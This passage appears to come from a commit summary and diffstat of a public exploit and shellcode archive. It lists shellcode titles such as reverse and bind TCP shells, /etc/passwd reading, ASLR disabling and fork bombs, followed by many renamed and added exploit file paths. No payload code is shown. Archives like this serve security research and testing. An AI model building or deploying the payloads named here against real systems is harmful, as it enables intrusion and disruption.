bytes) Linux/StrongARM - setuid() Shellcode (20 bytes) Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes) Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes) Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes) Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes) Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes) Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) Windows 10 x64 - Egghunter Shellcode (45 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86 - Egghunter Shellcode (18 bytes) Linux/x86 - Disable ASLR Security Shellcode (80 bytes) Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes) Linux x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes) Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x86 - Fork Bomb Shellcode (9 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes) Linux x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes) Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x86 - Fork Bomb Shellcode (9 bytes) Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) Windows x64 - API Hooking Shellcode (117 bytes) Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) Windows x64 - API Hooking Shellcode (117 bytes) --- .../{lin_x86-64 => linux_x86-64}/dos/21224.c | 0 .../dos/33585.txt | 0 .../{lin_x86-64 => linux_x86-64}/dos/36266.c | 0 .../dos/37868.txt | 0 .../dos/37876.txt | 0 .../dos/37879.txt | 0 .../dos/37880.txt | 0 .../local/15023.c | 0 .../local/15024.c | 0 .../local/24555.c | 0 .../local/24746.c | 0 .../local/26131.c | 0 .../local/31347.c | 0 .../local/32751.c | 0 .../local/33516.c | 0 .../local/33589.c | 0 .../local/34134.c | 0 .../local/35472.txt | 0 .../local/36310.txt | 0 .../local/36311.txt | 0 .../local/37722.c | 0 .../local/40049.c | 0 .../local/40811.c | 0 .../local/40871.c | 0 .../local/42275.c | 0 .../{lin_x86-64 => linux_x86-64}/local/4460.c | 0 .../{lin_x86-64 => linux_x86-64}/local/9083.c | 0 .../remote/32277.txt | 0 .../remote/42964.rb | 0 exploits/{lin_x86 => linux_x86}/dos/36741.py | 0 exploits/{lin_x86 => linux_x86}/dos/38763.txt | 0 exploits/{lin_x86 => linux_x86}/dos/39669.txt | 0 exploits/{lin_x86 => linux_x86}/local/15916.c | 0 .../{lin_x86 => linux_x86}/local/26709.txt | 0 .../{lin_x86 => linux_x86}/local/37724.asm | 0 .../{lin_x86 => linux_x86}/local/40435.rb | 0 exploits/{lin_x86 => linux_x86}/local/42273.c | 0 exploits/{lin_x86 => linux_x86}/local/42274.c | 0 exploits/{lin_x86 => linux_x86}/local/42276.c | 0 exploits/{lin_x86 => linux_x86}/local/9542.c | 0 .../{lin_x86 => linux_x86}/remote/1291.pl | 0 .../{lin_x86 => linux_x86}/remote/16860.rb | 0 .../{lin_x86 => linux_x86}/remote/16861.rb | 0 .../{lin_x86 => linux_x86}/remote/20032.txt | 0 .../{lin_x86 => linux_x86}/remote/26737.pl | 0 exploits/{lin_x86 => linux_x86}/remote/269.c | 0 exploits/{lin_x86 => linux_x86}/remote/3615.c | 0 .../{lin_x86 => linux_x86}/remote/43030.rb | 0 .../{lin_x86 => linux_x86}/remote/43031.rb | 0 .../{lin_x86 => linux_x86}/webapps/34030.txt | 0 exploits/php/webapps/43535.txt | 37 + exploits/php/webapps/43543.txt | 45 + exploits/windows/dos/43547.txt | 225 +++++ exploits/windows/dos/43548.txt | 85 ++ exploits/windows/remote/43523.py | 100 ++ .../dos/18275.txt | 0 .../dos/38085.pl | 0 .../dos/39043.txt | 0 .../dos/39072.txt | 0 .../dos/39221.txt | 0 .../dos/39712.txt | 0 .../dos/40196.txt | 0 .../dos/41547.py | 0 .../dos/42445.html | 0 .../local/20861.txt | 0 .../local/30393.rb | 0 .../local/37064.py | 0 .../local/38222.rb | 0 .../local/39035.txt | 0 .../local/39520.txt | 0 .../local/39525.py | 0 .../local/39984.txt | 0 .../local/40336.py | 0 .../local/40337.py | 0 .../local/40342.py | 0 .../local/40348.py | 0 .../local/40349.py | 0 .../local/40380.py | 0 .../local/40451.rb | 0 .../local/41020.c | 0 .../local/41605.txt | 0 .../local/41721.c | 0 .../local/41722.c | 0 .../local/41908.txt | 0 .../local/42368.rb | 0 .../local/42435.txt | 0 .../local/42960.txt | 0 .../remote/34334.rb | 0 .../remote/39999.rb | 0 .../remote/42030.py | 0 .../remote/42031.py | 0 .../remote/42354.html | 0 .../{win_x86 => windows_x86}/dos/10102.pl | 0 .../{win_x86 => windows_x86}/dos/12457.txt | 0 .../{win_x86 => windows_x86}/dos/15214.py | 0 .../{win_x86 => windows_x86}/dos/15306.pl | 0 exploits/{win_x86 => windows_x86}/dos/15758.c | 0 .../{win_x86 => windows_x86}/dos/1977.cpp | 0 .../{win_x86 => windows_x86}/dos/34010.html | 0 .../{win_x86 => windows_x86}/dos/35182.txt | 0 exploits/{win_x86 => windows_x86}/dos/3527.pl | 0 .../{win_x86 => windows_x86}/dos/37881.txt | 0 .../{win_x86 => windows_x86}/dos/38265.txt | 0 .../{win_x86 => windows_x86}/dos/38266.txt | 0 .../{win_x86 => windows_x86}/dos/38267.txt | 0 .../{win_x86 => windows_x86}/dos/38268.txt | 0 .../{win_x86 => windows_x86}/dos/38269.txt | 0 .../{win_x86 => windows_x86}/dos/38270.txt | 0 .../{win_x86 => windows_x86}/dos/38271.txt | 0 .../{win_x86 => windows_x86}/dos/38273.txt | 0 .../{win_x86 => windows_x86}/dos/38274.txt | 0 .../{win_x86 => windows_x86}/dos/38275.txt | 0 .../{win_x86 => windows_x86}/dos/38276.txt | 0 .../{win_x86 => windows_x86}/dos/38277.txt | 0 .../{win_x86 => windows_x86}/dos/38278.txt | 0 .../{win_x86 => windows_x86}/dos/38279.txt | 0 .../{win_x86 => windows_x86}/dos/38280.txt | 0 .../{win_x86 => windows_x86}/dos/38307.txt | 0 .../{win_x86 => windows_x86}/dos/38444.py | 0 .../{win_x86 => windows_x86}/dos/39026.txt | 0 .../{win_x86 => windows_x86}/dos/39027.txt | 0 .../{win_x86 => windows_x86}/dos/39797.py | 0 .../{win_x86 => windows_x86}/dos/39993.txt | 0 .../{win_x86 => windows_x86}/dos/420.java | 0 .../{win_x86 => windows_x86}/dos/4293.php | 0 .../{win_x86 => windows_x86}/dos/4318.php | 0 exploits/{win_x86 => windows_x86}/dos/8611.pl | 0 exploits/{win_x86 => windows_x86}/dos/9606.pl | 0 .../{win_x86 => windows_x86}/local/11112.c | 0 .../{win_x86 => windows_x86}/local/11408.c | 0 .../{win_x86 => windows_x86}/local/14373.pl | 0 .../{win_x86 => windows_x86}/local/14961.py | 0 .../{win_x86 => windows_x86}/local/16678.rb | 0 .../{win_x86 => windows_x86}/local/18137.rb | 0 .../{win_x86 => windows_x86}/local/18861.php | 0 .../{win_x86 => windows_x86}/local/26452.rb | 0 .../{win_x86 => windows_x86}/local/33213.rb | 0 .../{win_x86 => windows_x86}/local/34037.txt | 0 .../{win_x86 => windows_x86}/local/34167.rb | 0 .../{win_x86 => windows_x86}/local/3451.c | 0 .../{win_x86 => windows_x86}/local/34982.rb | 0 .../{win_x86 => windows_x86}/local/35020.rb | 0 .../{win_x86 => windows_x86}/local/37732.c | 0 .../{win_x86 => windows_x86}/local/38403.txt | 0 .../{win_x86 => windows_x86}/local/3888.c | 0 .../{win_x86 => windows_x86}/local/3912.c | 0 .../{win_x86 => windows_x86}/local/39432.c | 0 .../{win_x86 => windows_x86}/local/39446.py | 0 .../{win_x86 => windows_x86}/local/39574.cs | 0 .../{win_x86 => windows_x86}/local/40039.cpp | 0 .../{win_x86 => windows_x86}/local/40564.c | 0 .../{win_x86 => windows_x86}/local/40627.c | 0 .../{win_x86 => windows_x86}/local/43192.c | 0 .../{win_x86 => windows_x86}/local/8799.txt | 0 .../{win_x86 => windows_x86}/remote/11615.txt | 0 .../{win_x86 => windows_x86}/remote/1264.pl | 0 .../{win_x86 => windows_x86}/remote/14941.rb | 0 .../{win_x86 => windows_x86}/remote/16466.rb | 0 .../{win_x86 => windows_x86}/remote/16714.rb | 0 .../{win_x86 => windows_x86}/remote/16731.rb | 0 .../{win_x86 => windows_x86}/remote/16738.rb | 0 .../{win_x86 => windows_x86}/remote/16743.rb | 0 .../{win_x86 => windows_x86}/remote/16751.rb | 0 .../{win_x86 => windows_x86}/remote/16759.rb | 0 .../{win_x86 => windows_x86}/remote/16763.rb | 0 .../{win_x86 => windows_x86}/remote/16782.rb | 0 .../{win_x86 => windows_x86}/remote/16783.rb | 0 .../{win_x86 => windows_x86}/remote/16786.rb | 0 .../{win_x86 => windows_x86}/remote/16809.rb | 0 .../{win_x86 => windows_x86}/remote/16825.rb | 0 .../{win_x86 => windows_x86}/remote/2680.pm | 0 .../{win_x86 => windows_x86}/remote/3680.sh | 0 .../{win_x86 => windows_x86}/remote/37812.rb | 0 .../{win_x86 => windows_x86}/remote/3822.c | 0 .../{win_x86 => windows_x86}/remote/38599.py | 0 .../{win_x86 => windows_x86}/remote/39729.rb | 0 .../remote/43125.html | 0 .../{win_x86 => windows_x86}/remote/4754.pl | 0 .../{win_x86 => windows_x86}/remote/5079.c | 0 .../{win_x86 => windows_x86}/remote/5330.c | 0 .../{win_x86 => windows_x86}/remote/584.c | 0 .../{win_x86 => windows_x86}/remote/6100.py | 0 .../{win_x86 => windows_x86}/remote/8613.py | 0 .../{win_x86 => windows_x86}/remote/8614.py | 0 .../{win_x86 => windows_x86}/remote/8621.py | 0 .../{win_x86 => windows_x86}/remote/8623.rb | 0 .../webapps/14628.txt | 0 .../webapps/15100.txt | 0 .../webapps/15102.txt | 0 .../webapps/15128.txt | 0 files_exploits.csv | 375 +++---- files_shellcodes.csv | 954 +++++++++--------- shellcodes/arm/43530.c | 86 ++ shellcodes/arm/43531.c | 35 + shellcodes/arm/43532.c | 35 + shellcodes/arm/43533.c | 34 + shellcodes/arm/43534.c | 47 + shellcodes/arm/43536.c | 99 ++ shellcodes/arm/43537.c | 10 + shellcodes/arm/43538.c | 16 + shellcodes/arm/43539.c | 55 + shellcodes/{hardware => linux_mips}/27132.txt | 0 shellcodes/linux_sparc/43545.c | 36 + shellcodes/linux_sparc/43546.c | 16 + .../{lin_x86-64 => linux_x86-64}/13296.c | 0 .../{lin_x86-64 => linux_x86-64}/13320.c | 0 .../{lin_x86-64 => linux_x86-64}/13463.c | 0 .../{lin_x86-64 => linux_x86-64}/13464.s | 0 .../{lin_x86-64 => linux_x86-64}/13670.c | 0 .../{lin_x86-64 => linux_x86-64}/13688.c | 0 .../{lin_x86-64 => linux_x86-64}/13691.c | 0 .../{lin_x86-64 => linux_x86-64}/13908.c | 0 .../{lin_x86-64 => linux_x86-64}/13915.txt | 0 .../{lin_x86-64 => linux_x86-64}/13943.c | 0 .../{lin_x86-64 => linux_x86-64}/14305.c | 0 .../{lin_x86-64 => linux_x86-64}/18197.c | 0 .../{lin_x86-64 => linux_x86-64}/18585.s | 0 .../{lin_x86-64 => linux_x86-64}/34667.c | 0 .../{lin_x86-64 => linux_x86-64}/35205.txt | 0 .../{lin_x86-64 => linux_x86-64}/35586.c | 0 .../{lin_x86-64 => linux_x86-64}/35587.c | 0 .../{lin_x86-64 => linux_x86-64}/36359.c | 0 .../{lin_x86-64 => linux_x86-64}/36858.c | 0 .../{lin_x86-64 => linux_x86-64}/37362.c | 0 .../{lin_x86-64 => linux_x86-64}/37401.asm | 0 .../{lin_x86-64 => linux_x86-64}/38150.txt | 0 .../{lin_x86-64 => linux_x86-64}/38239.asm | 0 .../{lin_x86-64 => linux_x86-64}/38469.c | 0 .../{lin_x86-64 => linux_x86-64}/38708.asm | 0 .../{lin_x86-64 => linux_x86-64}/38815.c | 0 .../{lin_x86-64 => linux_x86-64}/39149.c | 0 .../{lin_x86-64 => linux_x86-64}/39152.c | 0 .../{lin_x86-64 => linux_x86-64}/39185.c | 0 .../{lin_x86-64 => linux_x86-64}/39203.c | 0 .../{lin_x86-64 => linux_x86-64}/39312.c | 0 .../{lin_x86-64 => linux_x86-64}/39383.c | 0 .../{lin_x86-64 => linux_x86-64}/39388.c | 0 .../{lin_x86-64 => linux_x86-64}/39390.c | 0 .../{lin_x86-64 => linux_x86-64}/39578.c | 0 .../{lin_x86-64 => linux_x86-64}/39617.c | 0 .../{lin_x86-64 => linux_x86-64}/39624.c | 0 .../{lin_x86-64 => linux_x86-64}/39625.c | 0 .../{lin_x86-64 => linux_x86-64}/39684.c | 0 .../{lin_x86-64 => linux_x86-64}/39700.c | 0 .../{lin_x86-64 => linux_x86-64}/39718.c | 0 .../{lin_x86-64 => linux_x86-64}/39758.c | 0 .../{lin_x86-64 => linux_x86-64}/39763.c | 0 .../{lin_x86-64 => linux_x86-64}/39847.c | 0 .../{lin_x86-64 => linux_x86-64}/39869.c | 0 .../{lin_x86-64 => linux_x86-64}/40029.c | 0 .../{lin_x86-64 => linux_x86-64}/40052.c | 0 .../{lin_x86-64 => linux_x86-64}/40061.c | 0 .../{lin_x86-64 => linux_x86-64}/40079.c | 0 .../{lin_x86-64 => linux_x86-64}/40122.txt | 0 .../{lin_x86-64 => linux_x86-64}/40139.c | 0 .../{lin_x86-64 => linux_x86-64}/40808.c | 0 .../{lin_x86-64 => linux_x86-64}/41089.c | 0 .../{lin_x86-64 => linux_x86-64}/41128.c | 0 .../{lin_x86-64 => linux_x86-64}/41174.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41398.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41439.c | 0 .../{lin_x86-64 => linux_x86-64}/41468.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41477.c | 0 .../{lin_x86-64 => linux_x86-64}/41498.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41503.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41509.nasm | 0 .../{lin_x86-64 => linux_x86-64}/41510.nsam | 0 .../{lin_x86-64 => linux_x86-64}/41750.txt | 0 .../{lin_x86-64 => linux_x86-64}/41883.txt | 0 .../{lin_x86-64 => linux_x86-64}/41970.asm | 0 .../{lin_x86-64 => linux_x86-64}/42126.c | 0 .../{lin_x86-64 => linux_x86-64}/42179.c | 0 .../{lin_x86-64 => linux_x86-64}/42339.c | 0 .../{lin_x86-64 => linux_x86-64}/42485.c | 0 .../{lin_x86-64 => linux_x86-64}/42522.c | 0 .../{lin_x86-64 => linux_x86-64}/42523.c | 0 .../{lin_x86-64 => linux_x86-64}/42791.c | 0 shellcodes/linux_x86-64/43549.c | 56 + shellcodes/linux_x86-64/43550.c | 29 + shellcodes/linux_x86-64/43551.c | 80 ++ shellcodes/linux_x86-64/43552.c | 56 + shellcodes/linux_x86-64/43553.c | 41 + shellcodes/{lin_x86 => linux_x86}/13307.c | 0 shellcodes/{lin_x86 => linux_x86}/13308.c | 0 shellcodes/{lin_x86 => linux_x86}/13309.asm | 0 shellcodes/{lin_x86 => linux_x86}/13310.c | 0 shellcodes/{lin_x86 => linux_x86}/13311.c | 0 shellcodes/{lin_x86 => linux_x86}/13312.c | 0 shellcodes/{lin_x86 => linux_x86}/13313.c | 0 shellcodes/{lin_x86 => linux_x86}/13314.c | 0 shellcodes/{lin_x86 => linux_x86}/13315.c | 0 shellcodes/{lin_x86 => linux_x86}/13316.c | 0 shellcodes/{lin_x86 => linux_x86}/13317.s | 0 shellcodes/{lin_x86 => linux_x86}/13318.s | 0 shellcodes/{lin_x86 => linux_x86}/13319.s | 0 shellcodes/{lin_x86 => linux_x86}/13321.c | 0 shellcodes/{lin_x86 => linux_x86}/13322.c | 0 shellcodes/{lin_x86 => linux_x86}/13323.c | 0 shellcodes/{lin_x86 => linux_x86}/13324.c | 0 shellcodes/{lin_x86 => linux_x86}/13325.c | 0 shellcodes/{lin_x86 => linux_x86}/13326.c | 0 shellcodes/{lin_x86 => linux_x86}/13327.c | 0 shellcodes/{lin_x86 => linux_x86}/13329.c | 0 shellcodes/{lin_x86 => linux_x86}/13330.c | 0 shellcodes/{lin_x86 => linux_x86}/13331.c | 0 shellcodes/{lin_x86 => linux_x86}/13332.c | 0 shellcodes/{lin_x86 => linux_x86}/13333.txt | 0 shellcodes/{lin_x86 => linux_x86}/13334.txt | 0 shellcodes/{lin_x86 => linux_x86}/13335.c | 0 shellcodes/{lin_x86 => linux_x86}/13336.c | 0 shellcodes/{lin_x86 => linux_x86}/13337.c | 0 shellcodes/{lin_x86 => linux_x86}/13338.c | 0 shellcodes/{lin_x86 => linux_x86}/13339.asm | 0 shellcodes/{lin_x86 => linux_x86}/13340.c | 0 shellcodes/{lin_x86 => linux_x86}/13341.c | 0 shellcodes/{lin_x86 => linux_x86}/13342.c | 0 shellcodes/{lin_x86 => linux_x86}/13343.asm | 0 shellcodes/{lin_x86 => linux_x86}/13344.c | 0 shellcodes/{lin_x86 => linux_x86}/13345.c | 0 shellcodes/{lin_x86 => linux_x86}/13346.s | 0 shellcodes/{lin_x86 => linux_x86}/13347.c | 0 shellcodes/{lin_x86 => linux_x86}/13348.c | 0 shellcodes/{lin_x86 => linux_x86}/13349.c | 0 shellcodes/{lin_x86 => linux_x86}/13350.c | 0 shellcodes/{lin_x86 => linux_x86}/13351.c | 0 shellcodes/{lin_x86 => linux_x86}/13352.c | 0 shellcodes/{lin_x86 => linux_x86}/13353.c | 0 shellcodes/{lin_x86 => linux_x86}/13354.c | 0 shellcodes/{lin_x86 => linux_x86}/13355.c | 0 shellcodes/{lin_x86 => linux_x86}/13356.c | 0 shellcodes/{lin_x86 => linux_x86}/13357.c | 0 shellcodes/{lin_x86 => linux_x86}/13358.c | 0 shellcodes/{lin_x86 => linux_x86}/13359.c | 0 shellcodes/{lin_x86 => linux_x86}/13360.c | 0 shellcodes/{lin_x86 => linux_x86}/13361.c | 0 shellcodes/{lin_x86 => linux_x86}/13362.c | 0 shellcodes/{lin_x86 => linux_x86}/13363.c | 0 shellcodes/{lin_x86 => linux_x86}/13365.c | 0 shellcodes/{lin_x86 => linux_x86}/13366.txt | 0 shellcodes/{lin_x86 => linux_x86}/13367.c | 0 shellcodes/{lin_x86 => linux_x86}/13368.c | 0 shellcodes/{lin_x86 => linux_x86}/13369.c | 0 shellcodes/{lin_x86 => linux_x86}/13370.c | 0 shellcodes/{lin_x86 => linux_x86}/13371.c | 0 shellcodes/{lin_x86 => linux_x86}/13372.c | 0 shellcodes/{lin_x86 => linux_x86}/13373.c | 0 shellcodes/{lin_x86 => linux_x86}/13374.c | 0 shellcodes/{lin_x86 => linux_x86}/13375.c | 0 shellcodes/{lin_x86 => linux_x86}/13376.c | 0 shellcodes/{lin_x86 => linux_x86}/13377.c | 0 shellcodes/{lin_x86 => linux_x86}/13378.c | 0 shellcodes/{lin_x86 => linux_x86}/13379.c | 0 shellcodes/{lin_x86 => linux_x86}/13380.c | 0 shellcodes/{lin_x86 => linux_x86}/13381.c | 0 shellcodes/{lin_x86 => linux_x86}/13382.c | 0 shellcodes/{lin_x86 => linux_x86}/13383.c | 0 shellcodes/{lin_x86 => linux_x86}/13384.c | 0 shellcodes/{lin_x86 => linux_x86}/13385.c | 0 shellcodes/{lin_x86 => linux_x86}/13386.c | 0 shellcodes/{lin_x86 => linux_x86}/13387.c | 0 shellcodes/{lin_x86 => linux_x86}/13388.c | 0 shellcodes/{lin_x86 => linux_x86}/13389.c | 0 shellcodes/{lin_x86 => linux_x86}/13390.c | 0 shellcodes/{lin_x86 => linux_x86}/13391.c | 0 shellcodes/{lin_x86 => linux_x86}/13392.c | 0 shellcodes/{lin_x86 => linux_x86}/13393.c | 0 shellcodes/{lin_x86 => linux_x86}/13394.c | 0 shellcodes/{lin_x86 => linux_x86}/13395.c | 0 shellcodes/{lin_x86 => linux_x86}/13396.c | 0 shellcodes/{lin_x86 => linux_x86}/13397.c | 0 shellcodes/{lin_x86 => linux_x86}/13398.c | 0 shellcodes/{lin_x86 => linux_x86}/13399.c | 0 shellcodes/{lin_x86 => linux_x86}/13400.c | 0 shellcodes/{lin_x86 => linux_x86}/13402.c | 0 shellcodes/{lin_x86 => linux_x86}/13403.c | 0 shellcodes/{lin_x86 => linux_x86}/13404.c | 0 shellcodes/{lin_x86 => linux_x86}/13405.c | 0 shellcodes/{lin_x86 => linux_x86}/13406.c | 0 shellcodes/{lin_x86 => linux_x86}/13407.c | 0 shellcodes/{lin_x86 => linux_x86}/13408.c | 0 shellcodes/{lin_x86 => linux_x86}/13409.c | 0 shellcodes/{lin_x86 => linux_x86}/13410.s | 0 shellcodes/{lin_x86 => linux_x86}/13411.c | 0 shellcodes/{lin_x86 => linux_x86}/13412.c | 0 shellcodes/{lin_x86 => linux_x86}/13413.c | 0 shellcodes/{lin_x86 => linux_x86}/13414.c | 0 shellcodes/{lin_x86 => linux_x86}/13415.c | 0 shellcodes/{lin_x86 => linux_x86}/13416.txt | 0 shellcodes/{lin_x86 => linux_x86}/13417.c | 0 shellcodes/{lin_x86 => linux_x86}/13418.c | 0 shellcodes/{lin_x86 => linux_x86}/13419.c | 0 shellcodes/{lin_x86 => linux_x86}/13420.c | 0 shellcodes/{lin_x86 => linux_x86}/13421.c | 0 shellcodes/{lin_x86 => linux_x86}/13422.c | 0 shellcodes/{lin_x86 => linux_x86}/13423.c | 0 shellcodes/{lin_x86 => linux_x86}/13424.txt | 0 shellcodes/{lin_x86 => linux_x86}/13425.c | 0 shellcodes/{lin_x86 => linux_x86}/13426.c | 0 shellcodes/{lin_x86 => linux_x86}/13427.c | 0 shellcodes/{lin_x86 => linux_x86}/13428.c | 0 shellcodes/{lin_x86 => linux_x86}/13429.c | 0 shellcodes/{lin_x86 => linux_x86}/13430.c | 0 shellcodes/{lin_x86 => linux_x86}/13431.c | 0 shellcodes/{lin_x86 => linux_x86}/13432.c | 0 shellcodes/{lin_x86 => linux_x86}/13433.c | 0 shellcodes/{lin_x86 => linux_x86}/13434.c | 0 shellcodes/{lin_x86 => linux_x86}/13435.c | 0 shellcodes/{lin_x86 => linux_x86}/13436.c | 0 shellcodes/{lin_x86 => linux_x86}/13437.c | 0 shellcodes/{lin_x86 => linux_x86}/13438.c | 0 shellcodes/{lin_x86 => linux_x86}/13439.c | 0 shellcodes/{lin_x86 => linux_x86}/13440.c | 0 shellcodes/{lin_x86 => linux_x86}/13441.c | 0 shellcodes/{lin_x86 => linux_x86}/13442.c | 0 shellcodes/{lin_x86 => linux_x86}/13443.c | 0 shellcodes/{lin_x86 => linux_x86}/13444.c | 0 shellcodes/{lin_x86 => linux_x86}/13445.c | 0 shellcodes/{lin_x86 => linux_x86}/13446.c | 0 shellcodes/{lin_x86 => linux_x86}/13447.c | 0 shellcodes/{lin_x86 => linux_x86}/13448.c | 0 shellcodes/{lin_x86 => linux_x86}/13449.c | 0 shellcodes/{lin_x86 => linux_x86}/13450.c | 0 shellcodes/{lin_x86 => linux_x86}/13451.c | 0 shellcodes/{lin_x86 => linux_x86}/13452.c | 0 shellcodes/{lin_x86 => linux_x86}/13453.c | 0 shellcodes/{lin_x86 => linux_x86}/13454.c | 0 shellcodes/{lin_x86 => linux_x86}/13455.c | 0 shellcodes/{lin_x86 => linux_x86}/13456.c | 0 shellcodes/{lin_x86 => linux_x86}/13457.c | 0 shellcodes/{lin_x86 => linux_x86}/13458.c | 0 shellcodes/{lin_x86 => linux_x86}/13460.c | 0 shellcodes/{lin_x86 => linux_x86}/13461.c | 0 shellcodes/{lin_x86 => linux_x86}/13462.c | 0 shellcodes/{lin_x86 => linux_x86}/13548.asm | 0 shellcodes/{lin_x86 => linux_x86}/13549.c | 0 shellcodes/{lin_x86 => linux_x86}/13550.c | 0 shellcodes/{lin_x86 => linux_x86}/13551.c | 0 shellcodes/{lin_x86 => linux_x86}/13553.c | 0 shellcodes/{lin_x86 => linux_x86}/13563.asm | 0 shellcodes/{lin_x86 => linux_x86}/13566.c | 0 shellcodes/{lin_x86 => linux_x86}/13572.c | 0 shellcodes/{lin_x86 => linux_x86}/13576.asm | 0 shellcodes/{lin_x86 => linux_x86}/13577.txt | 0 shellcodes/{lin_x86 => linux_x86}/13578.txt | 0 shellcodes/{lin_x86 => linux_x86}/13579.c | 0 shellcodes/{lin_x86 => linux_x86}/13586.txt | 0 shellcodes/{lin_x86 => linux_x86}/13599.txt | 0 shellcodes/{lin_x86 => linux_x86}/13600.txt | 0 shellcodes/{lin_x86 => linux_x86}/13601.txt | 0 shellcodes/{lin_x86 => linux_x86}/13602.txt | 0 shellcodes/{lin_x86 => linux_x86}/13609.c | 0 shellcodes/{lin_x86 => linux_x86}/13627.c | 0 shellcodes/{lin_x86 => linux_x86}/13628.c | 0 shellcodes/{lin_x86 => linux_x86}/13632.c | 0 shellcodes/{lin_x86 => linux_x86}/13661.txt | 0 shellcodes/{lin_x86 => linux_x86}/13669.c | 0 shellcodes/{lin_x86 => linux_x86}/13671.c | 0 shellcodes/{lin_x86 => linux_x86}/13673.c | 0 shellcodes/{lin_x86 => linux_x86}/13675.c | 0 shellcodes/{lin_x86 => linux_x86}/13676.c | 0 shellcodes/{lin_x86 => linux_x86}/13677.c | 0 shellcodes/{lin_x86 => linux_x86}/13680.c | 0 shellcodes/{lin_x86 => linux_x86}/13681.c | 0 shellcodes/{lin_x86 => linux_x86}/13682.c | 0 shellcodes/{lin_x86 => linux_x86}/13692.c | 0 shellcodes/{lin_x86 => linux_x86}/13697.c | 0 shellcodes/{lin_x86 => linux_x86}/13698.c | 0 shellcodes/{lin_x86 => linux_x86}/13702.c | 0 shellcodes/{lin_x86 => linux_x86}/13703.txt | 0 shellcodes/{lin_x86 => linux_x86}/13712.c | 0 shellcodes/{lin_x86 => linux_x86}/13715.c | 0 shellcodes/{lin_x86 => linux_x86}/13716.c | 0 shellcodes/{lin_x86 => linux_x86}/13722.c | 0 shellcodes/{lin_x86 => linux_x86}/13723.c | 0 shellcodes/{lin_x86 => linux_x86}/13724.c | 0 shellcodes/{lin_x86 => linux_x86}/13725.txt | 0 shellcodes/{lin_x86 => linux_x86}/13726.txt | 0 shellcodes/{lin_x86 => linux_x86}/13728.c | 0 shellcodes/{lin_x86 => linux_x86}/13730.c | 0 shellcodes/{lin_x86 => linux_x86}/13731.c | 0 shellcodes/{lin_x86 => linux_x86}/13732.c | 0 shellcodes/{lin_x86 => linux_x86}/13742.c | 0 shellcodes/{lin_x86 => linux_x86}/13743.c | 0 shellcodes/{lin_x86 => linux_x86}/13910.c | 0 shellcodes/{lin_x86 => linux_x86}/14119.c | 0 shellcodes/{lin_x86 => linux_x86}/14216.c | 0 shellcodes/{lin_x86 => linux_x86}/14332.c | 0 shellcodes/{lin_x86 => linux_x86}/14334.c | 0 shellcodes/{lin_x86 => linux_x86}/14691.c | 0 shellcodes/{lin_x86 => linux_x86}/17194.txt | 0 shellcodes/{lin_x86 => linux_x86}/17371.txt | 0 shellcodes/{lin_x86 => linux_x86}/17559.c | 0 shellcodes/{lin_x86 => linux_x86}/18294.c | 0 shellcodes/{lin_x86 => linux_x86}/18379.c | 0 shellcodes/{lin_x86 => linux_x86}/18885.c | 0 shellcodes/{lin_x86 => linux_x86}/20195.c | 0 shellcodes/{lin_x86 => 